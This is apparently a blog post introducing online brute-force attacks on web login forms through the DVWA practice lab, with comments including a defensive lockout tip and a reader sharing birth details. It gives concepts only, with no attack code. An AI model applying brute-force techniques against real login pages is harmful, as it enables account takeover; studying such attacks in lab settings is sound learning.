BRUTE FORCE AUTHENTICATION ATTACKS

Brute-Force-Attacks.jpg

Brute Force Attacks: Authentication actually takes place in many other parts of the web application other then the main login page.

It is also present when you change your password, update your account information, use the password recovery functionality, answering secret questions, and when you use the remember me option.

If any of other authentication processes in flawed, the security of all other authentication mechanisms may be compromised.

The frightening thing about authentication vulnerabilities is that they can open the door for all other accounts to be compromised.

Imagine the carnage when an administrator’s account is compromised because of poor authentication!

We will be using the Brute Force exercise in DVWA as our guide to complete an online brute force authentication attack.

It is HTML form-based authentication page; just like over 90% of web application use.

Despite ongoing efforts to include additional factors into the authentication process, such as CAPTCHA and challenge questions, the traditional username and password is still the most popular authentication mechanism.

This attack is much different than the offline password has cracking that we completed with John the Ripper.

We will now be interacting directly with web application and database that process the username and password parameters during authentication.

Online brute force authentication hacking is much slower than offline password hash cracking because we are making repeated requests to the application and must wait for it to generate a response and send it back.

Sort:  

If you want me to do a drawing for you for your birthday - i can; I just need your birthdate, time and place of birth... then I can post it here and provide a link where you can download and print or you can give me your snail mail and i will send it to you - FREE - if you want to donate sbd - that's fine but it's up to you... peace and happy birthday

I am sorry i saw your comment really late and yeah i will be really happy if you do that for me it will be a great gift from your side and we will decide it later to print it out or receive the one you made for me.
my date of birth is 19th March time was 5:10 PM Quetta, Pakistan.
Thanks a lot :)

Hi! I am a robot. I just upvoted you! I found similar content that readers might be interested in:
https://issuu.com/elvedin/docs/the_basics_of_web_hacking_-_josh_pa/99

You got upvoted from @adriatik bot! Thank you to you for using our service. We really hope this will hope to promote your quality content!

This vulnerability is a really easy one to defend.. As dev you can block the account after a number of failed login attemps or just add an exponential delay, like 3 tries, 1 minute delay, 4 tries, 10 minutes delay, 5 tries 100 minutes delay and so on..